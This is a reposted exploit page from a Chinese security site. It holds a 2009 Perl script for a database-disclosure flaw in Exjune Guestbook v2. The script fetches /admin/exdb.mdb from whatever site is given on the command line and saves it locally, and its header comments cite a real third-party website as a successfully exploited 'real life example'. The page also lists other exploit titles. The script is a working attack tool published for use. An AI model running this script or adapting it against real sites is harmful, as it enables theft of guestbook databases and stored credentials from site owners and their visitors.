首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exjune Guestbook v2 Remote Database Disclosure Exploit
来源:NullArea.Net 作者:AlpHaNiX 发布时间:2009-04-10  
#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
###########
# Vulnerable :
# database path : /admin/exdb.mdb
##########
# Real Life Example :
#
#
# OOO  OOO           OO    OO        OO
#  OO   O             O     O         O
#  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO
#  O  O O   O   O     O     O        OOO    OO     OOOOOO       O
#  O   OO   O   O     O     O       O   O   O      O       OOOOOO
# OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO
#
#
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX
#
#
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
##########
# Greetz for Zigma/Djek/unary/r1z


use lwp::UserAgent;

system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n    ./exploit http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n\n\n OOO  OOO           OO    OO        OO\n" ;
print "  OO   O             O     O         O\n" ;
print "  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO\n" ;
print "  O  O O   O   O     O     O        OOO    OO     OOOOOO       O\n" ;
print "  O   OO   O   O     O     O       O   O   O      O       OOOOOO\n" ;
print " OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO\n" ;
print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site ....\n";
my $site      = $ARGV[0] ;
my $target    = $site."/admin/exdb.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request   = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();}
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Geeklog <= 1.5.2 SEC_authentic
·SWF Opener 1.3 (.swf File) Off
·The IBM BladeCenter Advanced M
·net2ftp versions 0.97 and belo
·Xilisoft Video Converter Wizar
·OTSTurntables 1.00.027 (.ofl)
·Chance-i DiViS-Web DVR System
·OTSTurntables 1.00.027 (.m3u/.
·w3bcms Gaestebuch 3.0.0 Blind
·GOM Player 2.1.16.6134 Subtitl
·PHP 5.2.9 curl safe_mode and o
·Linux Kernel < 2.6.29 exit_not
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved